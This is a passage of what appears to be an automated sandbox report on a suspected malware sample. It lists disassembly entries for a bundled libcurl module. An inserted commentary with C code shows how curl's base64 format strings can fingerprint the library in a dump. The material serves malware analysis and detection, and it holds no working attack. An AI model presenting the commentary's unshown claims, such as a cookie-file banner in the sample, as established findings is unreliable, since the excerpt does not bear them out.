                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                            • String ID: 0+tk
                                                                                                                            • API String ID: 776569668-1950648990
                                                                                                                            • Opcode ID: 13910025d95651ce11ef8b717217722e1949e0d252790c558f1c6dc48ce4233b
                                                                                                                            • Instruction ID: 8d1b2b85e80805f26ad5a6811ec0a281e8239c2ef68a84381a699a2fd23cbaf9
                                                                                                                            • Opcode Fuzzy Hash: 13910025d95651ce11ef8b717217722e1949e0d252790c558f1c6dc48ce4233b
                                                                                                                            • Instruction Fuzzy Hash: 79313D716083019FEB11AA75EA49B5E73E9FF00314F5448AAF559EB195DF38E940CB30
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6B6F06B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lnk), ref: 6B6F06EF
                                                                                                                              • Part of subcall function 6B6F06B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B6F072F
                                                                                                                            • curl_slist_free_all.LIBCURL(00000000,?,?,?,?,?,?,?,?,?,Moving trailers state machine from initialized to sending.,?,?,?), ref: 6B6FE994
                                                                                                                              • Part of subcall function 6B6DB530: ___from_strstr_to_strchr.LIBCMT ref: 6B6DB55B
                                                                                                                            • curl_slist_free_all.LIBCURL(00000000,?,Successfully compiled trailers.,?,?,?,?,?,?,?,?,?,Moving trailers state machine from initialized to sending.,?,?,?), ref: 6B6FE8CD
                                                                                                                            • curl_msnprintf.LIBCURL(?,0000000B,%zx%s,?,6B72BF70), ref: 6B6FEAC6
                                                                                                                              • Part of subcall function 6B6F05D0: curl_mvsnprintf.LIBCURL(?,00000100,6B6EC830,?), ref: 6B6F0610
                                                                                                                            Strings
                                                                                                                            • Signaling end of chunked upload after trailers., xrefs: 6B6FEBBE
                                                                                                                            • read function returned funny value, xrefs: 6B6FEA35
                                                                                                                            • operation aborted by callback, xrefs: 6B6FE945
                                                                                                                            • Successfully compiled trailers., xrefs: 6B6FE8BF
                                                                                                                            • Signaling end of chunked upload via terminating chunk., xrefs: 6B6FEB1B
                                                                                                                            • Read callback asked for PAUSE when not supported!, xrefs: 6B6FE9DC
                                                                                                                            • %zx%s, xrefs: 6B6FEAA9
                                                                                                                            • Moving trailers state machine from initialized to sending., xrefs: 6B6FE842
                                                                                                                            • operation aborted by trailing headers callback, xrefs: 6B6FE96F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_msnprintfcurl_mvsnprintfcurl_slist_free_all$___from_strstr_to_strchr
                                                                                                                            • String ID: %zx%s$Moving trailers state machine from initialized to sending.$Read callback asked for PAUSE when not supported!$Signaling end of chunked upload after trailers.$Signaling end of chunked upload via terminating chunk.$Successfully compiled trailers.$operation aborted by callback$operation aborted by trailing headers callback$read function returned funny value
                                                                                                                            • API String ID: 2651734479-586909597
                                                                                                                            • Opcode ID: 15b5f75adae323d47655727904edebe06619b777ec2944eae5018b1d6dc850e1
                                                                                                                            • Instruction ID: 5ec24b1a15113c08fe1dc6715742f985755d5435214dab81c5911d016e519dec
                                                                                                                            • Opcode Fuzzy Hash: 15b5f75adae323d47655727904edebe06619b777ec2944eae5018b1d6dc850e1
                                                                                                                            • Instruction Fuzzy Hash: 5CA118B1E04205ABD704CF78DD867EEFBB9FF05314F00016AE918A7241DBB925958BE5
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6B6E27F0: curl_slist_free_all.LIBCURL(?,?), ref: 6B6E2801
                                                                                                                              • Part of subcall function 6B6E27F0: curl_slist_free_all.LIBCURL(?), ref: 6B6E2812
                                                                                                                            • curl_mime_init.LIBCURL(?), ref: 6B6CB187
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                             • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                             • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_slist_free_all$curl_mime_init
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2112604817-0
                                                                                                                            • Opcode ID: a88f9dcfef39ff9364b0d8e19b579247a46f3ed52b70fa7909d89819ecf8c82a
                                                                                                                            • Instruction ID: 609fc19877e9ead87d7f5812058a829b777d767c9ee2c97e5721692f23df01fd
                                                                                                                            • Opcode Fuzzy Hash: a88f9dcfef39ff9364b0d8e19b579247a46f3ed52b70fa7909d89819ecf8c82a
                                                                                                                            • Instruction Fuzzy Hash: D58116F2E496196BDB118E749C41BAB77A9FF04324F0D02A4EC08AB351E72DDD1587E2
APIs
• curl_easy_strerror.LIBCURL(00000000), ref: 6B6CC103
Strings
• partial download completed, closing connection, xrefs: 6B6CC25B
• Received only partial file: %I64d bytes, xrefs: 6B6CC417
• Remembering we are in dir "%s", xrefs: 6B6CC082
• Exceeded storage allocation, xrefs: 6B6CC2B3
• Uploaded unaligned file size (%I64d out of %I64d bytes), xrefs: 6B6CC382
• server did not report OK, got %d, xrefs: 6B6CC29E
• Failure sending ABOR command: %s, xrefs: 6B6CC109
• ABOR, xrefs: 6B6CC0E6
• control connection looks dead, xrefs: 6B6CC20D
• No data was received!, xrefs: 6B6CC3FD
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: curl_easy_strerror
• String ID: ABOR$Exceeded storage allocation$Failure sending ABOR command: %s$No data was received!$Received only partial file: %I64d bytes$Remembering we are in dir "%s"$Uploaded unaligned file size (%I64d out of %I64d bytes)$control connection looks dead$partial download completed, closing connection$server did not report OK, got %d
• API String ID: 1399792982-944385548
• Opcode ID: 5d4d9abe4c6b7a3d533ef39aa8259b8a0b34df525ab9a1a7a67d9c0112e99e71
• Instruction ID: 0328b1e6326bbd5512f31284260a2f6341376b5db5cb92c0c9e85d3c4e7a325f
• Opcode Fuzzy Hash: 5d4d9abe4c6b7a3d533ef39aa8259b8a0b34df525ab9a1a7a67d9c0112e99e71
• Instruction Fuzzy Hash: CCE1EFF19042449BEB11CF68C884B9B3BA5EF46314F1845E9EC5E9B282D73D9580CBA2
APIs
• _free.LIBCMT ref: 6B725D6C
  • Part of subcall function 6B71F7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B725EE0,6B7438A0,00000000,6B7438A0,00000000,?,6B725F07,6B7438A0,00000007,6B7438A0,?,6B72532A,6B7438A0), ref: 6B71F800
  • Part of subcall function 6B71F7EA: GetLastError.KERNEL32(6B7438A0,?,6B725EE0,6B7438A0,00000000,6B7438A0,00000000,?,6B725F07,6B7438A0,00000007,6B7438A0,?,6B72532A,6B7438A0,6B7438A0), ref: 6B71F812
• _free.LIBCMT ref: 6B725D7E
• _free.LIBCMT ref: 6B725D90
• _free.LIBCMT ref: 6B725DA2
• _free.LIBCMT ref: 6B725DB4
• _free.LIBCMT ref: 6B725DC6
• _free.LIBCMT ref: 6B725DD8
• _free.LIBCMT ref: 6B725DEA
• _free.LIBCMT ref: 6B725DFC
• _free.LIBCMT ref: 6B725E0E
• _free.LIBCMT ref: 6B725E20
• _free.LIBCMT ref: 6B725E32
• _free.LIBCMT ref: 6B725E44
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: d6f6521d2478c0c5de8c77a867bf66b78e53d88e6d2cf8f268a1b18c22cca338
• Instruction ID: dcd120c6d182f2d577ab5bf9f2236e12ce8fe9c6d3c0d9284ae8c497c468e10f
• Opcode Fuzzy Hash: d6f6521d2478c0c5de8c77a867bf66b78e53d88e6d2cf8f268a1b18c22cca338
• Instruction Fuzzy Hash: 6D215731508604DBCB14FE78E2DAD1F73F9BA043153A00C6AF569EB549DB78F8908AB4
APIs
• GetModuleHandleA.KERNEL32(kernel32,?,00000002,6B6FAEAE), ref: 6B6FACCE
• GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 6B6FACE8
• _strpbrk.LIBCMT ref: 6B6FACFC
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: AddressHandleModuleProc_strpbrk
• String ID: AddDllDirectory$LoadLibraryExA$kernel32
• API String ID: 1657965159-3327535076
• Opcode ID: fabef46edf3d5ddf9ffdfcb8dbc91b4d58f699b7bd92a86de09bc508f7fc962e
• Instruction ID: 3cdfb9cf8c5b9df081703b9c2b6757d82918591f0d8d06973f1655f8902bb730
• Opcode Fuzzy Hash: fabef46edf3d5ddf9ffdfcb8dbc91b4d58f699b7bd92a86de09bc508f7fc962e
• Instruction Fuzzy Hash: 51417B75705301ABEF105E78AC44BAABB7EEF42216F1041FAEC45D7302EA76D50B86A0
APIs
  • Part of subcall function 6B71D46B: CreateFileW.KERNEL32(00000000,00000000,?,6B71D873,?,?,00000000,?,6B71D873,00000000,0000000C), ref: 6B71D488
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B71D8DE
• __dosmaperr.LIBCMT ref: 6B71D8E5
• GetFileType.KERNEL32(00000000), ref: 6B71D8F1
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B71D8FB
• __dosmaperr.LIBCMT ref: 6B71D904
• CloseHandle.KERNEL32(00000000), ref: 6B71D924
• CloseHandle.KERNEL32(?), ref: 6B71DA71
• GetLastError.KERNEL32 ref: 6B71DAA3
• __dosmaperr.LIBCMT ref: 6B71DAAA
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175
• Opcode ID: 9054532257f645352201d3244592876df4c68bf5ab8d49cdf312eb2ceb4418c3
• Instruction ID: e64a4bbb05c511aba57e95086107a43e2067e70b1e50d35fbbb5aa4c696e1284
• Opcode Fuzzy Hash: 9054532257f645352201d3244592876df4c68bf5ab8d49cdf312eb2ceb4418c3
• Instruction Fuzzy Hash: DDA10332A481549FCF199F78C95579E3BB0AB0A324F1901AAF825AF391D738D902CB65
APIs
• curl_msnprintf.LIBCURL(?,00000018,%04d%02d%02d %02d:%02d:%02d GMT,?,?,?,?,?,?), ref: 6B6CDC9D
• curl_msnprintf.LIBCURL(?,00000080,Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT,?,?,?,?,?,?), ref: 6B6CDD74
  • Part of subcall function 6B6F06B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lnk), ref: 6B6F06EF
  • Part of subcall function 6B6F06B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B6F072F
Strings
• %04d%02d%02d %02d:%02d:%02d GMT, xrefs: 6B6CDC95
• %04d%02d%02d%02d%02d%02d, xrefs: 6B6CDC58
• Given file does not exist, xrefs: 6B6CDC0D
• unsupported MDTM reply format, xrefs: 6B6CDBFA
• Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT, xrefs: 6B6CDD69
• The requested document is not old enough, xrefs: 6B6CDE3D
• Skipping time comparison, xrefs: 6B6CDE44
• The requested document is not new enough, xrefs: 6B6CDDF0
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: curl_msnprintf$curl_mvsnprintf
• String ID: %04d%02d%02d %02d:%02d:%02d GMT$%04d%02d%02d%02d%02d%02d$Given file does not exist$Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT$Skipping time comparison$The requested document is not new enough$The requested document is not old enough$unsupported MDTM reply format
• API String ID: 405648482-226030088
• Opcode ID: 22b839fdc5e172a77159fc2357bd0b84df3d44dc5f576edaad93ca6e5be10000
• Instruction ID: 197667be88505e7d98f464c3d17ead9ae89c6b987209ede2662b76dbc58d2ceb
• Opcode Fuzzy Hash: 22b839fdc5e172a77159fc2357bd0b84df3d44dc5f576edaad93ca6e5be10000
• Instruction Fuzzy Hash: A461B3B1D81208ABDB20CE74DD81FDBB7B9EF59304F0044E9E55DA7101EB39AA44CB66
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6EDA0F
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6EDA4D
• curl_msnprintf.LIBCURL(6B6D1696,00000009,%2I64d:%02I64d:%02I64d,6B6D1696,?,00000000,?,?,6B6D1696,?,6B6D1696,0000003C,00000000,00000000,?,00000E10), ref: 6B6EDAA5
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6EDABD
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6EDAF2
• curl_msnprintf.LIBCURL(6B6D1696,00000009,%3I64dd %02I64dh,00000000,6B6D1696,00000000,?,?,6B6D1696,00000E10,00000000,00000000,?,00015180,00000000,?), ref: 6B6EDB07
• curl_msnprintf.LIBCURL(6B6D1696,00000009,%7I64dd,00000000,?,?,6B6D1696,00015180,00000000,?,6B6D1696,00000E10,00000000,?,6B6D1696,?), ref: 6B6EDB22
Memory Dump Source
• Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
• Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmp
• Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$curl_msnprintf
• String ID: %2I64d:%02I64d:%02I64d$%3I64dd %02I64dh$%7I64dd
• API String ID: 2752550610-564197712
• Opcode ID: 0f65646651f7a0fc50060a6456349b8454f9c428810601e43edc711e83d06594
• Instruction ID: 0f6af298b92b236e4dd58dee2108c11e613e4a8f3652fa1d2189de4d7d3c34f1
• Opcode Fuzzy Hash: 0f65646651f7a0fc50060a6456349b8454f9c428810601e43edc711e83d06594
• Instruction Fuzzy Hash: 0C4127B3B452587AEB205D7D8C41FAEB7ADDBC4654F010175FE08EB181E6759E1183A0
                                                                                                                            APIs
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000005,%c%c%c%c,?,?,?,?), ref: 6B6C1B38
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000005,%c%c%c=,?,?,?), ref: 6B6C1B5D
                                                                                                                            • curl_msnprintf.LIBCURL(?,00000005,%c%c==,?,?), ref: 6B6C1B79
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_msnprintf
                                                                                                                            • String ID: %c%c%c%c$%c%c%c=$%c%c==$%ld%s
                                                                                                                            • API String ID: 1809024409-1523555428
                                                                                                                            • Opcode ID: 4e89af8ca3a0744049a8e06133cd5a8fc1e5283f227c1a151c68a508b1547f8e
                                                                                                                            • Instruction ID: 756191bbaedad514f8018278870dc97671c3e05179a42d73150d25e069e8ed33
                                                                                                                            • Opcode Fuzzy Hash: 4e89af8ca3a0744049a8e06133cd5a8fc1e5283f227c1a151c68a508b1547f8e
                                                                                                                            • Instruction Fuzzy Hash: C6B1F7B18046659FDB11CF68C841BEBBBF8EF06305F0441D9E89997242E738EA55CFA1
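The three curl_msnprintf calls in the entry above (refs 6B6C1B38, 6B6C1B5D and 6B6C1B79), each with a 5-byte output window and the formats %c%c%c%c, %c%c%c= and %c%c==, are the tail-handling switch of a base64 encoder: a full 3-byte group yields four symbols, a 2-byte tail yields three symbols plus "=", a 1-byte tail yields two symbols plus "==", and the window of 5 is four characters plus the NUL. curl's lib/base64.c has long written its encoder this way, which is why these strings identify the routine in a stripped DLL. The program below is an added example, not code from the report, from the sample or from curl. It re-implements that layout so the mapping from format string to padding case is visible, and adds a small scan that counts the three formats in a raw buffer; the function names and the two sample buffers are assumptions made for illustration, the buffers being constructed here rather than taken from the dump.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example; names (b64_encode, count_curl_b64_formats, the sample
 * buffers) are assumed for illustration and are not from the report. */

static const char table64[] =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

/* Base64-encode inlen bytes of in. Returns a malloc'd NUL-terminated string
 * (caller frees) or NULL on allocation failure. The tail switch uses the
 * three snprintf formats listed in the report, each with a 5-byte window
 * (4 output characters plus the terminating NUL). */
char *b64_encode(const unsigned char *in, size_t inlen)
{
    size_t outlen = ((inlen + 2) / 3) * 4 + 1;
    char *out = malloc(outlen);
    char *p = out;
    if(!out)
        return NULL;
    while(inlen > 0) {
        unsigned char ibuf[3] = {0, 0, 0};
        unsigned char obuf[4];
        size_t parts = inlen < 3 ? inlen : 3;   /* bytes consumed this round */
        memcpy(ibuf, in, parts);
        in += parts;
        inlen -= parts;
        /* split the 24 input bits into four 6-bit table indexes */
        obuf[0] = (ibuf[0] & 0xFC) >> 2;
        obuf[1] = ((ibuf[0] & 0x03) << 4) | ((ibuf[1] & 0xF0) >> 4);
        obuf[2] = ((ibuf[1] & 0x0F) << 2) | ((ibuf[2] & 0xC0) >> 6);
        obuf[3] = ibuf[2] & 0x3F;
        switch(parts) {
        case 1: /* one byte left: two symbols and "==" */
            snprintf(p, 5, "%c%c==", table64[obuf[0]], table64[obuf[1]]);
            break;
        case 2: /* two bytes left: three symbols and "=" */
            snprintf(p, 5, "%c%c%c=", table64[obuf[0]], table64[obuf[1]],
                     table64[obuf[2]]);
            break;
        default: /* full 3-byte group: four symbols, no padding */
            snprintf(p, 5, "%c%c%c%c", table64[obuf[0]], table64[obuf[1]],
                     table64[obuf[2]], table64[obuf[3]]);
            break;
        }
        p += 4;
    }
    *p = '\0';
    return out;
}

/* Encode a C string and compare with the expected text; returns 1 on match. */
int b64_check(const char *plain, const char *expected)
{
    char *enc = b64_encode((const unsigned char *)plain, strlen(plain));
    int ok = enc && strcmp(enc, expected) == 0;
    free(enc);
    return ok;
}

/* Byte-exact substring search (memmem is not standard C). */
static int contains(const unsigned char *buf, size_t len, const char *pat)
{
    size_t plen = strlen(pat), i;
    if(len < plen)
        return 0;
    for(i = 0; i + plen <= len; i++)
        if(memcmp(buf + i, pat, plen) == 0)
            return 1;
    return 0;
}

/* Count how many of the three tail formats occur in a raw buffer (0..3).
 * All three together are the fingerprint of this encoder layout. */
int count_curl_b64_formats(const unsigned char *buf, size_t len)
{
    static const char *const pats[] = {"%c%c%c%c", "%c%c%c=", "%c%c=="};
    int n = 0;
    size_t i;
    for(i = 0; i < 3; i++)
        n += contains(buf, len, pats[i]);
    return n;
}

/* Constructed stand-ins for a memory dump; not taken from the sample. */
static const unsigned char full_dump[] =
    "JUNK\0%c%c%c%c\0%c%c%c=\0%c%c==\0%ld%s\0";
static const unsigned char partial_dump[] = "\0%c%c%c%c\0%c%c%c=\0x";

int full_dump_score(void)
{
    return count_curl_b64_formats(full_dump, sizeof(full_dump) - 1);
}

int partial_dump_score(void)
{
    return count_curl_b64_formats(partial_dump, sizeof(partial_dump) - 1);
}

int main(void)
{
    const char *name = "reservation .exe";
    char *e = b64_encode((const unsigned char *)name, strlen(name));
    printf("%s -> %s\n", name, e ? e : "(alloc failed)");
    free(e);
    printf("full dump: %d/3, partial dump: %d/3\n",
           full_dump_score(), partial_dump_score());
    return 0;
}
```

A score of 3 on a dump section that also carries "Unknown error %d (%#x)" and the Netscape cookie-file banner is strong evidence of a statically linked or bundled libcurl rather than of custom encoding code; a score of 1 or 2 is weak on its own, since the individual formats are generic.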
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(?,?,00000100), ref: 6B6FA0E7
                                                                                                                            • _strncpy.LIBCMT ref: 6B6FA12D
                                                                                                                            • _strrchr.LIBCMT ref: 6B6FA16D
                                                                                                                            • _strrchr.LIBCMT ref: 6B6FA188
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 6B6FA1B3
                                                                                                                            • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 6B6FA1C1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$_strrchr$_strncpy
                                                                                                                            • String ID: Unknown error %d (%#x)
                                                                                                                            • API String ID: 1320708361-2414550090
                                                                                                                            • Opcode ID: 4bc7eb8cb7fa0174de4a4c8cef1df29752d394e603d3ce6d8c3afe2fd8b8b869
                                                                                                                            • Instruction ID: 11b8faec238d637ce63f0664058769893bab3c1bf6ada8b2aeda52ad49f0f00f
                                                                                                                            • Opcode Fuzzy Hash: 4bc7eb8cb7fa0174de4a4c8cef1df29752d394e603d3ce6d8c3afe2fd8b8b869
                                                                                                                            • Instruction Fuzzy Hash: D82124F0A08218ABDB019E759D46B6F7BBEDF56259F0500A9FC0497341FB3CD90282B2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 94790f7b36c75f92f305361892dd1a9517c1e099814a6b8a2d9c92fe5c616704
                                                                                                                            • Instruction ID: 9aebfa192b8b12b5170a03353edde7138b648a09940d312f7f953abd4a19ffda
                                                                                                                            • Opcode Fuzzy Hash: 94790f7b36c75f92f305361892dd1a9517c1e099814a6b8a2d9c92fe5c616704
                                                                                                                            • Instruction Fuzzy Hash: 7FC1D774E1C2099FDB05CFA9CA95BAD7BB5AF4A304F0840A9F814AB781C778D941CB71
                                                                                                                            Strings
                                                                                                                            • Content-Length: %I64d, xrefs: 6B6CA87D
                                                                                                                            • failed to resume file:// transfer, xrefs: 6B6CAC25
                                                                                                                            • Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT%s, xrefs: 6B6CA935
                                                                                                                            • Can't get the size of file., xrefs: 6B6CA9CE
                                                                                                                            • Accept-ranges: bytes, xrefs: 6B6CA8AC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___from_strstr_to_strchr
